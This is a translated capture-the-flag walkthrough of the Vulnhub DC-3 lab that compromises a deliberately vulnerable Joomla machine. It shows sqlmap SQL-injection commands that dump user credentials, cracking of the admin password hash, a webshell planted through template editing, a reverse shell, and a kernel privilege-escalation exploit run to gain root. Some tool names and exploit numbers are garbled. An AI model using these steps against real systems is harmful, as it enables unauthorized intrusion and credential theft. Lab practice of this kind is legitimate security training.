Vulnhub-DC-3 target drone reproduction complete process

Two verbose sentences:
The process before the rights escalation was completed a month ago. At that time, there was a problem with the rights escalation and it was shelved. It was only completed today, so the IP address may have changed.
Note: The IP address that appears later is 192.168.200.55, which is also the target IP address. If this article can be of help to you, I would be honored.

1. Set up the environment

1. Tools

Attack aircraft: kali (192.168.200.14)
Target drone: DC-3 (unknown)

2.Attention

The network connection method of the attack aircraft and the target aircraft must be the same. In addition, the network connection method of DC-1 is the NAT mode, which is the same as the network connection mode of kali (of course, the bridge mode can also be selected)

DC-1 Network Design
After clicking Advanced, you can view the MAC address of the DC-1 target machine to facilitate identification when scanning IP.

2. Information collection

1. Scan the surviving hosts in the same network segment

The MAC address of the target drone dc-3, determine the IP address based on the MAC address
image.png
One:

arp-scan -l

image.png
Second:

nmap -sP 192.168.200.0/24 -T4

image.png
Third:

natdiscover

image.png

2. Scan target IP open ports

nmap -sV -p- 192.168.200.8
#-sV scans software information running on the target host port
#-p- Scan all ports 0-65535

image.png
You can see this site, only port 80 is open

3. Scan the background directory

Using the dirsearch tool, you can see the administrator directory, which should be the background
image.png

4. Fingerprint collection

Login to the website
A famous CMS system
image.png
The English translation on the left is:
This time, there is only one flag, one entry point, and no clues. To get this flag you obviously have to gain root privileges (elevated privileges). How you become a root is up to you – and, obviously, the system. Good luck and I hope you enjoy this little challenge.

Scan using joomscan

joomscan -u http://192.168.200.8/

joomscan installation method

sudo apt-get install joomscan

image.png
General: You can go to Baidu to search for vulnerabilities related to it according to the framework version, first log in to the backend directory
image.png
After searching on Baidu, you can find the same SQL vulnerabilities
image.png
Use the KILI tool to find vulnerabilities
image.png
View Files,
image.png

5.Background blast

image.png
sqlmap lists database library names
sqlmap -u “http://192.168.200.8/index.php ?option=com_fields & view=fields & layout=modal & list[fullordering]=updatexml” –risk=3 –level= 5 –random-agent –dbs -p list[fullordering]
Payload built based on the provided SQLmap

image.png

sqlmap lists all table names under the database joomladb
sqlmap -u “http://192.168.200.8/index.php?option=com_fields & view=fields & layout=modal & list[fullordering]=updatexml” –risk=3 –level= 5 –random-agent -D “joomladb” –tables -p list[fullordering]
image.png
Found #_users table
List the field types of the users table
sqlmap -u “http://192.168.200.8/index.php?option=com_fields & view=fields & layout=modal & list[fullordering]=updatexml” –risk=3 –level= 5 –random-agent -D “joomladb” -T “#__users” –columns -p list[fullordering]
Information in #__users
image.png
Determine the account name. The account password is generally “username,password”
Explosive data
sqlmap -u “http://192.168.200.8/index.php?option=com_fields & view=fields & layout=modal & list[fullordering]=updatexml” –dbms mysql -D joomladb -T ‘#__users’ -C id,name,password,username –dump
image.png

 $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu #Hash encryption

Use the join tool in kali to decrypt

vi admin.txt #Edit Write the ciphertext
john admin.txt #Crack

image.png
After cracking, the login password is: snoopy Account: admin
Log in to the background
image.png

3. Vulnerability detection

Upload Webshell

The source code of the website can be found, and the php file in the template can be edited.
image.png
Joomla backend editable template, use this function to create a test.php under the template, write a sentence, Ant Sword is successfully connected

image.png

image.png

image.png
The path to upload the one-sentence Trojan was as follows. At this time, you can browse the website directory and open a virtual terminal.
image.png

image.png
The template asks for the path (directly accessing the current folder can obtain the contents of the current folder)

http://192.168.200.8/templates/beez3/html/

image.png

Rebound shell

Upload a rebound shell file in the /templates/beez3 template. Remember the upload path. The file is created by yourself. The file name of this article is shell.php.
image.png

Rebound shell successful
image.png

Use EXP

Use the searchsploit tool to search for privilege escalation in Ubuntu 16.04 and find a “denial of service vulnerability” that can be used to escalate privileges

searchsploit ubuntu 16.04

image.png
View vulnerabilities and download EXP

cp /usr/share/exploitdb/exploits/linux/local/39772.txt shell.txt
cat shelll.txt

The file content provides the EXP URL
image.png

Download (this step is implemented in the target machine, this step is performed incorrectly)
image.png
unzip files

unzip 39772.zip #Unzip the 29772.zip file
cd 39772
tar -xvf exploit.tar #Unzip the exploit privilege escalation script tar package
cd ebpf_mapfd_doubleput_exploit

image.png
image.png
image.png

Elevation of privilege

Compile code

./compile.sh #Execute the script and compile the file

image.png
Elevate privileges and obtain root privileges

./doubleput #Execute privilege escalation file

wait a little while
image.png
image.png

Article reference: https://blog.csdn.net/weixin_43583637/article/details/101554815